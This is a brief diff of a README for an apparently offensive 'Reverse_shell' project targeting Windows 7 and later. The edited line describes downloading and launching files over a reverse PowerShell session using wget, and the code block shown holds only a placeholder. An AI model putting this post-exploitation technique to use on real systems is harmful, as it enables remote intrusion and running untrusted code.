devGnode/Reverse_shell/README.md

 ### Win >= 7 Bind reverse shell \[ powershell.exe \]

 <img src="https://zupimages.net/up/19/01/wq32.png">

-After to be connected to the powershell, you can download and launch some file with this method :
+After get a reverse powershell, you can download and lauch somes files with this trick, just using all power of Windows shell with wget command.

 ```
 [ powershell command ]